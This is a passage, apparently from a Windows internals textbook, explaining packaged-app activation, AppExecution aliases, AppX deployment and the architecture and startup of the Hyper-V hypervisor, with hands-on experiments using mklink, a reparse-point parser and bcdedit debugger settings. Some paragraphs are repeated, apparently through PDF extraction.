In the case of UWP, the Shell32 library has no idea that the executable it will launch is a UWP
application, so it calls the CreateProcessAsUser API without specifying any package identity.
In a different way, Shell32 can identify Centennial apps; thus, in this case, the entire activation
process is executed, and the application correctly launched. If you try to launch the two links
using the command prompt, none of them will correctly start the application. This is explained
by the fact that the command prompt doesn’t make use of Shell32 at all. Instead, it invokes the
CreateProcess API directly from its own code. This demonstrates the different activations of each
type of packaged application.
Note Starting with Windows 10 Creators Update (RS2), the Modern Application Model
supports the concept of Optional packages (internally called RelatedSet). Optional packages
are heavily used in games, where the main game supports even DLC (or expansions), and in
packages that represent suites: Microsoft Office is a good example. A user can download
and install Word and implicitly the framework package that contains all the Office common
code. When the user wants to install even Excel, the deployment operation could skip the
download of the main Framework package because Word is an optional package of its main
Office framework.
Optional packages have relationship with their main packages through their manifest files.
In the manifest file, there is the declaration of the dependency to the main package (using
AMUID). Deeply describing Optional packages architecture is beyond the scope of this book.
Now you can create two links to the application’s executables using the commands:
mklink "%USERPROFILE%\Desktop\notepad.exe" "<Notepad++ executable Full Path>"
mklink "%USERPROFILE%\Desktop\camera.exe" "<WindowsCamera executable full path>
replacing the content between the < and > symbols with the real executable path discovered
by the first two commands.
You can now close the command prompt and the two applications. You should have created
two new links in your desktop. Unlike with the Notepad.exe link, if you try to launch the Camera
application from your desktop, the activation fails, and Windows returns an error dialog box like
the following:
This happens because Windows Explorer uses the Shell32 library to activate executable links.
In the case of UWP, the Shell32 library has no idea that the executable it will launch is a UWP
application, so it calls the CreateProcessAsUser API without specifying any package identity.
CreateProcessAsUser API without specifying any package identity.
CreateProcessAsUser
In a different way, Shell32 can identify Centennial apps; thus, in this case, the entire activation
process is executed, and the application correctly launched. If you try to launch the two links
using the command prompt, none of them will correctly start the application. This is explained
by the fact that the command prompt doesn’t make use of Shell32 at all. Instead, it invokes the
CreateProcess API directly from its own code. This demonstrates the different activations of each
type of packaged application.
CHAPTER 8 System mechanisms
263
AppExecution aliases
As we have previously described, packaged applications could not be activated directly through their
executable file. This represents a big limitation, especially for the new modern Console applications.
With the goal of enabling the launch of Modern apps (Centennial and UWP) through the command
line, starting from Windows 10 Fall Creators Update (build 1709), the Modern Application Model has
introduced the concept of AppExecution aliases. With this new feature, the user can launch Edge or
any other modern applications through the console command line. An AppExecution alias is basi-
cally a 0-bytes length executable file located in C:\Users\<UserName>\AppData\Local\Microsoft\
WindowsApps (as shown in Figure 8-46.). The location is added in the system executable search path
list (through the PATH environment variable); as a result, to execute a modern application, the user
could specify any executable file name located in this folder without the complete path (like in the Run
dialog box or in the console command line).
FIGURE 8-46 The AppExecution aliases main folder.
How can the system execute a 0-byte file? The answer lies in a little-known feature of the file system:
reparse points. Reparse points are usually employed for symbolic links creation, but they can store any
data, not only symbolic link information. The Modern Application Model uses this feature to store the
packaged application’s activation data (package family name, Application user model ID, and applica-
tion path) directly into the reparse point.
264
CHAPTER 8 System mechanisms
When the user launches an AppExecution alias executable, the CreateProcess API is used as usual.
The NtCreateUserProcess system call, used to orchestrate the kernel-mode process creation (see the
“Flow of CreateProcess” section of Chapter 3 in Part 1, for details) fails because the content of the file is
empty. The file system, as part of normal process creation, opens the target file (through IoCreateFileEx
API), encounters the reparse point data (while parsing the last node of the path) and returns a STATUS_
REPARSE code to the caller. NtCreateUserProcess translates this code to the STATUS_IO_REPARSE_TAG_
NOT_HANDLED error and exits. The CreateProcess API now knows that the process creation has failed
due to an invalid reparse point, so it loads and calls into the ApiSetHost.AppExecutionAlias.dll library,
which contains code that parses modern applications’ reparse points.
The library’s code parses the reparse point, grabs the packaged application activation data, and
calls into the AppInfo service with the goal of correctly stamping the token with the needed security at-
tributes. AppInfo verifies that the user has the correct license for running the packaged application and
checks the integrity of its files (through the State Repository). The actual process creation is done by the
calling process. The CreateProcess API detects the reparse error and restarts its execution starting with
the correct package executable path (usually located in C:\Program Files\WindowsApps\). This time, it
correctly creates the process and the AppContainer token or, in case of Centennial, initializes the virtu-
alization layer (actually, in this case, another RPC into AppInfo is used again). Furthermore, it creates the
HAM host and its activity, which are needed for the application. The activation at this point is complete.
EXPERIMENT: Reading the AppExecution alias data
In this experiment, you extract AppExecution alias data from the 0-bytes executable file. You
can use the FsReparser utility (found in this book’s downloadable resources) to parse both the
reparse points or the extended attributes of the NTFS file system. Just run the tool in a command
prompt window and specify the READ command-line parameter:
C:\Users\Andrea\AppData\Local\Microsoft\WindowsApps>fsreparser read MicrosoftEdge.exe
File System Reparse Point / Extended Attributes Parser 0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Reading UWP attributes...
Source file: MicrosoftEdge.exe.
The source file does not contain any Extended Attributes.
The file contains a valid UWP Reparse point (version 3).
Package family name: Microsoft.MicrosoftEdge_8wekyb3d8bbwe
Application User Model Id: Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge
UWP App Target full path: C:\Windows\System32\SystemUWPLauncher.exe
Alias Type: UWP Single Instance
As you can see from the output of the tool, the CreateProcess API can extract all the informa-
tion that it needs to properly execute a modern application’s activation. This explains why you
can launch Edge from the command line.
EXPERIMENT: Reading the AppExecution alias data
In this experiment, you extract AppExecution alias data from the 0-bytes executable file. You
can use the FsReparser utility (found in this book’s downloadable resources) to parse both the
reparse points or the extended attributes of the NTFS file system. Just run the tool in a command
prompt window and specify the READ command-line parameter:
C:\Users\Andrea\AppData\Local\Microsoft\WindowsApps>fsreparser read MicrosoftEdge.exe
File System Reparse Point / Extended Attributes Parser 0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Reading UWP attributes...
Source file: MicrosoftEdge.exe.
The source file does not contain any Extended Attributes.
The file contains a valid UWP Reparse point (version 3).
Package family name: Microsoft.MicrosoftEdge_8wekyb3d8bbwe
Application User Model Id: Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge
UWP App Target full path: C:\Windows\System32\SystemUWPLauncher.exe
Alias Type: UWP Single Instance
As you can see from the output of the tool, the CreateProcess API can extract all the informa-
tion that it needs to properly execute a modern application’s activation. This explains why you
can launch Edge from the command line.
CHAPTER 8 System mechanisms
265
Package registration
When a user wants to install a modern application, usually she opens the AppStore, looks for the ap-
plication, and clicks the Get button. This action starts the download of an archive that contains a bunch
of files: the package manifest file, the application digital signature, and the block map, which represent
the chain of trust of the certificates included in the digital signature. The archive is initially stored in the
C:\Windows\SoftwareDistribution\Download folder. The AppStore process (WinStore.App.exe) com-
municates with the Windows Update service (wuaueng.dll), which manages the download requests.
The downloaded files are manifests that contain the list of all the modern application’s files, the
application dependencies, the license data, and the steps needed to correctly register the package.
The Windows Update service recognizes that the download request is for a modern application, veri-
fies the calling process token (which should be an AppContainer), and, using services provided by the
AppXDeploymentClient.dll library, verifies that the package is not already installed in the system. It
then creates an AppX Deployment request and, through RPC, sends it to the AppX Deployment Server.
The latter runs as a PPL service in a shared service host process (which hosts even the Client License
Service, running as the same protected level). The Deployment Request is placed into a queue, which
is managed asynchronously. When the AppX Deployment Server sees the request, it dequeues it and
spawns a thread that starts the actual modern application deployment process.
Note Starting with Windows 8.1, the UWP deployment stack supports the concept of
bundles. Bundles are packages that contain multiple resources, like different languages
or features that have been designed only for certain regions. The deployment stack
implements an applicability logic that can download only the needed part of the
compressed bundle after checking the user profile and system settings.
A modern application deployment process involves a complex sequence of events. We summarize
here the entire deployment process in three main phases.
Phase 1: Package staging
After Windows Update has downloaded the application manifest, the AppX Deployment Server verifies
that all the package dependencies are satisfied, checks the application prerequisites, like the target
supported device family (Phone, Desktop, Xbox, and so on) and checks whether the file system of
the target volume is supported. All the prerequisites that the application needs are expressed in the
manifest file with each dependency. If all the checks pass, the staging procedure creates the pack-
age root directory (usually in C:\Program Files\WindowsApps\<PackageFullName>) and its subfold-
ers. Furthermore, it protects the package folders, applying proper ACLs on all of them. If the modern
application is a Centennial type, it loads the daxexec.dll library and creates VFS reparse points needed
by the Windows Container Isolation minifilter driver (see the “Centennial applications” section earlier
in this chapter) with the goal of virtualizing the application data folder properly. It finally saves the
package root path into the HKLM\SOFTWARE\Classes\LocalSettings\Software\Microsoft\Windows\
CurrentVersion\AppModel\PackageRepository\Packages\<PackageFullName> registry key, in the Path
registry value.
266
CHAPTER 8 System mechanisms
The staging procedure then preallocates the application’s files on disk, calculates the final down-
load size, and extracts the server URL that contains all the package files (compressed in an AppX file). It
finally downloads the final AppX from the remote servers, again using the Windows Update service.
Phase 2: User data staging
This phase is executed only if the user is updating the application. This phase simply restores the user
data of the previous package and stores them in the new application path.
Phase 3: Package registration
The most important phase of the deployment is the package registration. This complex phase uses
services provided by AppXDeploymentExtensions.onecore.dll library (and AppXDeploymentExtensions
.desktop.dll for desktop-specific deployment parts). We refer to it as Package Core Installation. At this
stage, the AppX Deployment Server needs mainly to update the State Repository. It creates new entries
for the package, for the one or more applications that compose the package, the new tiles, package ca-
pabilities, application license, and so on. To do this, the AppX Deployment server uses database trans-
actions, which it finally commits only if no previous errors occurred (otherwise, they will be discarded).
When all the database transactions that compose a State Repository deployment operation are com-
mitted, the State Repository can call the registered listeners, with the goal of notifying each client that
has requested a notification. (See the “State Repository” section in this chapter for more information
about the change and event tracking feature of the State Repository.)
The last steps for the package registration include creating the Dependency Mini Repository file and
updating the machine registry to reflect the new data stored in the State Repository. This terminates
the deployment process. The new application is now ready to be activated and run.
Note For readability reasons, the deployment process has been significantly simplified.
For example, in the described staging phase, we have omitted some initial subphases, like
the Indexing phase, which parses the AppX manifest file; the Dependency Manager phase,
used to create a work plan and analyze the package dependencies; and the Package In Use
phase, which has the goal of communicating with PLM to verify that the package is not
already installed and in use.
Furthermore, if an operation fails, the deployment stack must be able to revert all the
changes. The other revert phases have not been described in the previous section.
Conclusion
In this chapter, we have examined the key base system mechanisms on which the Windows executive
is built. In the next chapter, we introduce the virtualization technologies that Windows supports with
the goal of improving the overall system security, providing a fast execution environment for virtual
machines, isolated containers, and secure enclaves.
267
C H A P T E R 9
Virtualization technologies
O
ne of the most important technologies used for running multiple operating systems on the same
physical machine is virtualization. At the time of this writing, there are multiple types of virtualiza-
tion technologies available from different hardware manufacturers, which have evolved over the years.
Virtualization technologies are not only used for running multiple operating systems on a physical
machine, but they have also become the basics for important security features like the Virtual Secure
Mode (VSM) and Hypervisor-Enforced Code Integrity (HVCI), which can’t be run without a hypervisor.
In this chapter, we give an overview of the Windows virtualization solution, called Hyper-V. Hyper-V
is composed of the hypervisor, which is the component that manages the platform-dependent virtu-
alization hardware, and the virtualization stack. We describe the internal architecture of Hyper-V and
provide a brief description of its components (memory manager, virtual processors, intercepts, sched-
uler, and so on). The virtualization stack is built on the top of the hypervisor and provides different ser-
vices to the root and guest partitions. We describe all the components of the virtualization stack (VM
Worker process, virtual machine management service, VID driver, VMBus, and so on) and the different
hardware emulation that is supported.
In the last part of the chapter, we describe some technologies based on the virtualization, such as
VSM and HVCI. We present all the secure services that those technologies provide to the system.
The Windows hypervisor
The Hyper-V hypervisor (also known as Windows hypervisor) is a type-1 (native or bare-metal) hyper-
visor: a mini operating system that runs directly on the host’s hardware to manage a single root and
one or more guest operating systems. Unlike type-2 (or hosted) hypervisors, which run on the base of a
conventional OS like normal applications, the Windows hypervisor abstracts the root OS, which knows
about the existence of the hypervisor and communicates with it to allow the execution of one or more
guest virtual machines. Because the hypervisor is part of the operating system, managing the guests
inside it, as well as interacting with them, is fully integrated in the operating system through standard
management mechanisms such as WMI and services. In this case, the root OS contains some enlighten-
ments. Enlightenments are special optimizations in the kernel and possibly device drivers that detect
that the code is being run virtualized under a hypervisor, so they perform certain tasks differently, or
more efficiently, considering this environment.
Figure 9-1 shows the basic architecture of the Windows virtualization stack, which is described in
detail later in this chapter.
268
CHAPTER 9 Virtualization technologies
Root Partition
VMWPs
Enlightened
Windows
Child Partition
Enlightened
Linux
Child Partition
Unenlightened
Child Partition
VMMS
User Applications
User Applications
User Applications
WMI
I/O
Stack
Drivers
I/O
Stack
Drivers
VMBus
WinHv
VID
VSps
VSCs/ICs
WinHv
LinuxHv
I/O
Stack
Drivers
Linux
VSCs/ICs
VMBus
Kernel
Processors
Hypervisor
Memory
Hypercalls
Scheduler
Partition Manager
Address Management
MSRs
APIC
VMBus
FIGURE 9-1 The Hyper-V architectural stack (hypervisor and virtualization stack).
At the bottom of the architecture is the hypervisor, which is launched very early during the system
boot and provides its services for the virtualization stack to use (through the use of the hypercall inter-
face). The early initialization of the hypervisor is described in Chapter 12, “Startup and shutdown.” The
hypervisor startup is initiated by the Windows Loader, which determines whether to start the hypervisor
and the Secure Kernel; if the hypervisor and Secure Kernel are started, the hypervisor uses the services
of the Hvloader.dll to detect the correct hardware platform and load and start the proper version of
the hypervisor. Because Intel and AMD (and ARM64) processors have differing implementations of
hardware-assisted virtualization, there are different hypervisors. The correct one is selected at boot-up
time after the processor has been queried through CPUID instructions. On Intel systems, the Hvix64.exe
binary is loaded; on AMD systems, the Hvax64.exe image is used. As of the Windows 10 May 2019
Update (19H1), the ARM64 version of Windows supports its own hypervisor, which is implemented in
the Hvaa64.exe image.
At a high level, the hardware virtualization extension used by the hypervisor is a thin layer that
resides between the OS kernel and the processor. This layer, which intercepts and emulates in a safe
manner sensitive operations executed by the OS, is run in a higher privilege level than the OS kernel.
(Intel calls this mode VMXROOT. Most books and literature define the VMXROOT security domain as
“Ring -1.”) When an operation executed by the underlying OS is intercepted, the processor stops to run
the OS code and transfer the execution to the hypervisor at the higher privilege level. This operation is
commonly referred to as a VMEXIT event. In the same way, when the hypervisor has finished process-
ing the intercepted operation, it needs a way to allow the physical CPU to restart the execution of the
OS code. New opcodes have been defined by the hardware virtualization extension, which allow a
VMENTER event to happen; the CPU restarts the execution of the OS code at its original privilege level.
CHAPTER 9 Virtualization technologies
269
Partitions, processes, and threads
One of the key architectural components behind the Windows hypervisor is the concept of a partition.
A partition essentially represents the main isolation unit, an instance of an operating system instal-
lation, which can refer either to what’s traditionally called the host or the guest. Under the Windows
hypervisor model, these two terms are not used; instead, we talk of either a root partition or a child
partition, respectively. A partition is composed of some physical memory and one or more virtual
processors (VPs) with their local virtual APICs and timers. (In the global term, a partition also includes
a virtual motherboard and multiple virtual peripherals. These are virtualization stack concepts, which
do not belong to the hypervisor.)
At a minimum, a Hyper-V system has a root partition—in which the main operating system control-
ling the machine runs—the virtualization stack, and its associated components. Each operating system
running within the virtualized environment represents a child partition, which might contain certain
additional tools that optimize access to the hardware or allow management of the operating system.
Partitions are organized in a hierarchical way. The root partition has control of each child and receives
some notifications (intercepts) for certain kinds of events that happen in the child. The majority of the
physical hardware accesses that happen in the root are passed through by the hypervisor; this means
that the parent partition is able to talk directly to the hardware (with some exceptions). As a counter-
part, child partitions are usually not able to communicate directly with the physical machine’s hardware
(again with some exceptions, which are described later in this chapter in the section “The virtualization
stack”). Each I/O is intercepted by the hypervisor and redirected to the root if needed.
One of the main goals behind the design of the Windows hypervisor was to have it be as small and
modular as possible, much like a microkernel—no need to support any hypervisor driver or provide a
full, monolithic module. This means that most of the virtualization work is actually done by a separate
virtualization stack (refer to Figure 9-1). The hypervisor uses the existing Windows driver architecture
and talks to actual Windows device drivers. This architecture results in several components that provide
and manage this behavior, which are collectively called the virtualization stack. Although the hypervi-
sor is read from the boot disk and executed by the Windows Loader before the root OS (and the parent
partition) even exists, it is the parent partition that is responsible for providing the entire virtualization
stack. Because these are Microsoft components, only a Windows machine can be a root partition. The
Windows OS in the root partition is responsible for providing the device drivers for the hardware on the
system, as well as for running the virtualization stack. It’s also the management point for all the child
partitions. The main components that the root partition provides are shown in Figure 9-2.
270
CHAPTER 9 Virtualization technologies
Virtualization stack
User mode
Kernel mode
WMI provider
VMM service
VM worker
processes
Windows 10
Virtualization
service
providers
(VSPs)
Device
drivers
Windows
kernel
FIGURE 9-2 Components of the root partition.
Child partitions
A child partition is an instance of any operating system running parallel to the parent partition.
(Because you can save or pause the state of any child, it might not necessarily be running.) Unlike the
parent partition, which has full access to the APIC, I/O ports, and its physical memory (but not access
to the hypervisor’s and Secure Kernel’s physical memory), child partitions are limited for security and
management reasons to their own view of address space (the Guest Physical Address, or GPA, space,
which is managed by the hypervisor) and have no direct access to hardware (even though they may
have direct access to certain kinds of devices; see the “Virtualization stack” section for further details).
In terms of hypervisor access, a child partition is also limited mainly to notifications and state changes.
For example, a child partition doesn’t have control over other partitions (and can’t create new ones).
Child partitions have many fewer virtualization components than a parent partition because they
aren’t responsible for running the virtualization stack—only for communicating with it. Also, these
components can also be considered optional because they enhance performance of the environment but
aren’t critical to its use. Figure 9-3 shows the components present in a typical Windows child partition.
Guest applications
User mode
Kernel mode
Virtualization
service
clients
(VSCs)
Windows
kernel
Enlightenments
FIGURE 9-3 Components of a child partition.
CHAPTER 9 Virtualization technologies
271
Processes and threads
The Windows hypervisor represents a virtual machine with a partition data structure. A partition,
as described in the previous section, is composed of some memory (guest physical memory) and one
or more virtual processors (VP). Internally in the hypervisor, each virtual processor is a schedulable
entity, and the hypervisor, like the standard NT kernel, includes a scheduler. The scheduler dispatches
the execution of virtual processors, which belong to different partitions, to each physical CPU. (We
discuss the multiple types of hypervisor schedulers later in this chapter in the “Hyper-V schedulers”
section.) A hypervisor thread (TH_THREAD data structure) is the glue between a virtual processor and
its schedulable unit. Figure 9-4 shows the data structure, which represents the current physical execu-
tion context. It contains the thread execution stack, scheduling data, a pointer to the thread’s virtual
processor, the entry point of the thread dispatch loop (discussed later) and, most important, a pointer
to the hypervisor process that the thread belongs to.
Scheduling
Information
Physical Processor
Local Storage (PLS)
VP Stack
Owning Process
Dispatch Loop
Entry Point
FIGURE 9-4 The hypervisor’s thread data structure.
The hypervisor builds a thread for each virtual processor it creates and associates the newborn
thread with the virtual processor data structure (VM_VP).
A hypervisor process (TH_PROCESS data structure), shown in Figure 9-5, represents a partition
and is a container for its physical (and virtual) address space. It includes the list of the threads (which
are backed by virtual processors), scheduling data (the physical CPUs affinity in which the process is
allowed to run), and a pointer to the partition basic memory data structures (memory compartment,
reserved pages, page directory root, and so on). A process is usually created when the hypervisor
builds the partition (VM_PARTITION data structure), which will represent the new virtual machine.
Scheduling
Information
Thread List
Partition’s Memory
Compartment
FIGURE 9-5 The hypervisor’s process data structure.
272
CHAPTER 9 Virtualization technologies
Enlightenments
Enlightenments are one of the key performance optimizations that Windows virtualization takes ad-
vantage of. They are direct modifications to the standard Windows kernel code that can detect that the
operating system is running in a child partition and perform work differently. Usually, these optimiza-
tions are highly hardware-specific and result in a hypercall to notify the hypervisor.
An example is notifying the hypervisor of a long busy–wait spin loop. The hypervisor can keep some
state on the spin wait and decide to schedule another VP on the same physical processor until the wait
can be satisfied. Entering and exiting an interrupt state and access to the APIC can be coordinated with
the hypervisor, which can be enlightened to avoid trapping the real access and then virtualizing it.
Another example has to do with memory management, specifically translation lookaside buffer
(TLB) flushing. (See Part 1, Chapter 5, “Memory management,” for more information on these con-
cepts.) Usually, the operating system executes a CPU instruction to flush one or more stale TLB entries,
which affects only a single processor. In multiprocessor systems, usually a TLB entry must be flushed
from every active processor’s cache (the system sends an inter-processor interrupt to every active
processor to achieve this goal). However, because a child partition could be sharing physical CPUs with
many other child partitions, and some of them could be executing a different VM’s virtual processor
at the time the TLB flush is initiated, such an operation would also flush this information for those VMs.
Furthermore, a virtual processor would be rescheduled to execute only the TLB flushing IPI, resulting
in noticeable performance degradation. If Windows is running under a hypervisor, it instead issues a
hypercall to have the hypervisor flush only the specific information belonging to the child partition.
Partition’s privileges, properties, and version features
When a partition is initially created (usually by the VID driver), no virtual processors (VPs) are associated
with it. At that time, the VID driver is free to add or remove some partition’s privileges. Indeed, when
the partition is first created, the hypervisor assigns some default privileges to it, depending on its type.
A partition’s privilege describes which action—usually expressed through hypercalls or synthetic
MSRs (model specific registers)—the enlightened OS running inside a partition is allowed to perform
on behalf of the partition itself. For example, the Access Root Scheduler privilege allows a child parti-
tion to notify the root partition that an event has been signaled and a guest’s VP can be rescheduled
(this usually increases the priority of the guest’s VP-backed thread). The Access VSM privilege instead
allows the partition to enable VTL 1 and access its properties and configuration (usually exposed
through synthetic registers). Table 9-1 lists all the privileges assigned by default by the hypervisor.
Partition privileges can only be set before the partition creates and starts any VPs; the hypervisor
won’t allow requests to set privileges after a single VP in the partition starts to execute. Partition prop-
erties are similar to privileges but do not have this limitation; they can be set and queried at any time.
There are different groups of properties that can be queried or set for a partition. Table 9-2 lists the
properties groups.
When a partition is created, the VID infrastructure provides a compatibility level (which is specified
in the virtual machine’s configuration file) to the hypervisor. Based on that compatibility level, the hy-
pervisor enables or disables specific virtual hardware features that could be exposed by a VP to the un-
derlying OS. There are multiple features that tune how the VP behaves based on the VM’s compatibility
CHAPTER 9 Virtualization technologies
273
level. A good example would be the hardware Page Attribute Table (PAT), which is a configurable cach-
ing type for virtual memory. Prior to Windows 10 Anniversary Update (RS1), guest VMs weren’t able
to use PAT in guest VMs, so regardless of whether the compatibility level of a VM specifies Windows
10 RS1, the hypervisor will not expose the PAT registers to the underlying guest OS. Otherwise, in case
the compatibility level is higher than Windows 10 RS1, the hypervisor exposes the PAT support to the
underlying OS running in the guest VM. When the root partition is initially created at boot time, the
hypervisor enables the highest compatibility level for it. In that way the root OS can use all the features
supported by the physical hardware.
TABLE 9-1 Partition’s privileges
PARTITION TYPE
DEFAULT PRIVILEGES
Root and child partition
Read/write a VP’s runtime counter
Read the current partition reference time
Access SynIC timers and registers
Query/set the VP's virtual APIC assist page
Read/write hypercall MSRs
Request VP IDLE entry
Read VP’s index
Map or unmap the hypercall’s code area
Read a VP’s emulated TSC (time-stamp counter) and its frequency
Control the partition TSC and re-enlightenment emulation
Read/write VSM synthetic registers
Read/write VP’s per-VTL registers
Starts an AP virtual processor
Enables partition’s fast hypercall support
Root partition only
Create child partition
Look up and reference a partition by ID
Deposit/withdraw memory from the partition compartment
Post messages to a connection port
Signal an event in a connection port’s partition
Create/delete and get properties of a partition's connection port
Connect/disconnect to a partition's connection port
Map/unmap the hypervisor statistics page (which describe a VP, LP, partition, or hypervisor)
Enable the hypervisor debugger for the partition
Schedule child partition’s VPs and access SynIC synthetic MSRs
Trigger an enlightened system reset
Read the hypervisor debugger options for a partition
Child partition only
Generate an extended hypercall intercept in the root partition
Notify a root scheduler’s VP-backed thread of an event being signaled
EXO partition
None
TABLE 9-2 Partition’s properties
PROPERTY GROUP
DESCRIPTION
Scheduling properties
Set/query properties related to the classic and core scheduler, like Cap, Weight, and Reserve
Time properties
Allow the partition to be suspended/resumed
Debugging properties
Change the hypervisor debugger runtime configuration
Resource properties
Queries virtual hardware platform-specific properties of the partition (like TLB size, SGX
support, and so on)
Compatibility properties
Queries virtual hardware platform-specific properties that are tied to the initial compatibil-
ity features
274
CHAPTER 9 Virtualization technologies
The hypervisor startup
In Chapter 12, we analyze the modality in which a UEFI-based workstation boots up, and all the compo-
nents engaged in loading and starting the correct version of the hypervisor binary. In this section, we
briefly discuss what happens in the machine after the HvLoader module has transferred the execution
to the hypervisor, which takes control for the first time.
The HvLoader loads the correct version of the hypervisor binary image (depending on the CPU
manufacturer) and creates the hypervisor loader block. It captures a minimal processor context, which
the hypervisor needs to start the first virtual processor. The HvLoader then switches to a new, just-
created, address space and transfers the execution to the hypervisor image by calling the hypervisor
image entry point, KiSystemStartup, which prepares the processor for running the hypervisor and ini-
tializes the CPU_PLS data structure. The CPU_PLS represents a physical processor and acts as the PRCB
data structure of the NT kernel; the hypervisor is able to quickly address it (using the GS segment).
Differently from the NT kernel, KiSystemStartup is called only for the boot processor (the application
processors startup sequence is covered in the “Application Processors (APs) Startup” section later in this
chapter), thus it defers the real initialization to another function, BmpInitBootProcessor.
BmpInitBootProcessor starts a complex initialization sequence. The function examines the system
and queries all the CPU’s supported virtualization features (such as the EPT and VPID; the queried
features are platform-specific and vary between the Intel, AMD, or ARM version of the hypervisor). It
then determines the hypervisor scheduler, which will manage how the hypervisor will schedule virtual
processors. For Intel and AMD server systems, the default scheduler is the core scheduler, whereas the
root scheduler is the default for all client systems (including ARM64). The scheduler type can be manu-
ally overridden through the hypervisorschedulertype BCD option (more information about the different
hypervisor schedulers is available later in this chapter).
The nested enlightenments are initialized. Nested enlightenments allow the hypervisor to be ex-
ecuted in nested configurations, where a root hypervisor (called L0 hypervisor), manages the real hard-
ware, and another hypervisor (called L1 hypervisor) is executed in a virtual machine. After this stage, the
BmpInitBootProcessor routine performs the initialization of the following components:
I
Memory manager (initializes the PFN database and the root compartment).
I
The hypervisor’s hardware abstraction layer (HAL).
I
The hypervisor’s process and thread subsystem (which depends on the chosen scheduler type).
The system process and its initial thread are created. This process is special; it isn’t tied to any
partition and hosts threads that execute the hypervisor code.
I
The VMX virtualization abstraction layer (VAL). The VAL’s purpose is to abstract differences be-
tween all the supported hardware virtualization extensions (Intel, AMD, and ARM64). It includes
code that operates on platform-specific features of the machine’s virtualization technology in
use by the hypervisor (for example, on the Intel platform the VAL layer manages the “unrestrict-
ed guest” support, the EPT, SGX, MBEC, and so on).
I
The Synthetic Interrupt Controller (SynIC) and I/O Memory Management Unit (IOMMU).
CHAPTER 9 Virtualization technologies
275
I
The Address Manager (AM), which is the component responsible for managing the physical
memory assigned to a partition (called guest physical memory, or GPA) and its translation to
real physical memory (called system physical memory). Although the first implementation of
Hyper-V supported shadow page tables (a software technique for address translation), since
Windows 8.1, the Address manager uses platform-dependent code for configuring the hyper-
visor address translation mechanism offered by the hardware (extended page tables for Intel,
nested page tables for AMD). In hypervisor terms, the physical address space of a partition is
called address domain. The platform-independent physical address space translation is com-
monly called Second Layer Address Translation (SLAT). The term refers to the Intel’s EPT, AMD’s
NPT or ARM 2-stage address translation mechanism.
The hypervisor can now finish constructing the CPU_PLS data structure associated with the boot
processor by allocating the initial hardware-dependent virtual machine control structures (VMCS for
Intel, VMCB for AMD) and by enabling virtualization through the first VMXON operation. Finally, the
per-processor interrupt mapping data structures are initialized.
EXPERIMENT: Connecting the hypervisor debugger
In this experiment, you will connect the hypervisor debugger for analyzing the startup sequence
of the hypervisor, as discussed in the previous section. The hypervisor debugger is supported
only via serial or network transports. Only physical machines can be used to debug the hypervi-
sor, or virtual machines in which the “nested virtualization” feature is enabled (see the “Nested
virtualization” section later in this chapter). In the latter case, only serial debugging can be en-
abled for the L1 virtualized hypervisor.
For this experiment, you need a separate physical machine that supports virtualization exten-
sions and has the Hyper-V role installed and enabled. You will use this machine as the debugged
system, attached to your host system (which acts as the debugger) where you are running the
debugging tools. As an alternative, you can set up a nested VM, as shown in the “Enabling nested
virtualization on Hyper-V” experiment later in this chapter (in that case you don’t need another
physical machine).
As a first step, you need to download and install the “Debugging Tools for Windows” in the
host system, which are available as part of the Windows SDK (or WDK), downloadable from
https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk. As an alternative,
for this experiment you also can use the WinDbgX, which, at the time of this writing, is available
in the Windows Store by searching “WinDbg Preview.”
The debugged system for this experiment must have Secure Boot disabled. The hypervi-
sor debugging is not compatible with Secure Boot. Refer to your workstation user manual for
understanding how to disable Secure Boot (usually the Secure Boot settings are located in the
UEFI Bios). For enabling the hypervisor debugger in the debugged system, you should first open
an administrative command prompt (by typing cmd in the Cortana search box and selecting Run
as administrator).
EXPERIMENT: Connecting the hypervisor debugger
In this experiment, you will connect the hypervisor debugger for analyzing the startup sequence
of the hypervisor, as discussed in the previous section. The hypervisor debugger is supported
only via serial or network transports. Only physical machines can be used to debug the hypervi-
sor, or virtual machines in which the “nested virtualization” feature is enabled (see the “Nested
virtualization” section later in this chapter). In the latter case, only serial debugging can be en-
abled for the L1 virtualized hypervisor.
For this experiment, you need a separate physical machine that supports virtualization exten-
sions and has the Hyper-V role installed and enabled. You will use this machine as the debugged
system, attached to your host system (which acts as the debugger) where you are running the
debugging tools. As an alternative, you can set up a nested VM, as shown in the “Enabling nested
virtualization on Hyper-V” experiment later in this chapter (in that case you don’t need another
physical machine).
As a first step, you need to download and install the “Debugging Tools for Windows” in the
host system, which are available as part of the Windows SDK (or WDK), downloadable from
https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk. As an alternative,
for this experiment you also can use the WinDbgX, which, at the time of this writing, is available
in the Windows Store by searching “WinDbg Preview.”
The debugged system for this experiment must have Secure Boot disabled. The hypervi-
sor debugging is not compatible with Secure Boot. Refer to your workstation user manual for
understanding how to disable Secure Boot (usually the Secure Boot settings are located in the
UEFI Bios). For enabling the hypervisor debugger in the debugged system, you should first open
an administrative command prompt (by typing cmd in the Cortana search box and selecting Run
as administrator).
276
CHAPTER 9 Virtualization technologies
In case you want to debug the hypervisor through your network card, you should type the
following commands, replacing the terms <HostIp> with the IP address of the host system;
<HostPort>” with a valid port in the host (from 49152); and <NetCardBusParams> with the
bus parameters of the network card of the debugged system, specified in the XX.YY.ZZ format
(where XX is the bus number, YY is the device number, and ZZ is the function number). You
can discover the bus parameters of your network card through the Device Manager applet or
through the KDNET.exe tool available in the Windows SDK:
bcdedit /hypervisorsettings net hostip:<HostIp> port:<HostPort>
bcdedit /set {hypervisorsettings} hypervisordebugpages 1000
bcdedit /set {hypervisorsettings} hypervisorbusparams <NetCardBusParams>
bcdedit /set hypervisordebug on
The following figure shows a sample system in which the network interface used for debug-
ging the hypervisor is located in the 0.25.0 bus parameters, and the debugger is targeting a host
system configured with the IP address 192.168.0.56 on the port 58010.
Take note of the returned debugging key. After you reboot the debugged system, you should
run Windbg in the host, with the following command:
windbg.exe -d -k net:port=<HostPort>,key=<DebuggingKey>
You should be able to debug the hypervisor, and follow its startup sequence, even though
Microsoft may not release the symbols for the main hypervisor module:
In case you want to debug the hypervisor through your network card, you should type the
following commands, replacing the terms <HostIp> with the IP address of the host system;
<HostPort>” with a valid port in the host (from 49152); and <NetCardBusParams> with the
bus parameters of the network card of the debugged system, specified in the XX.YY.ZZ format
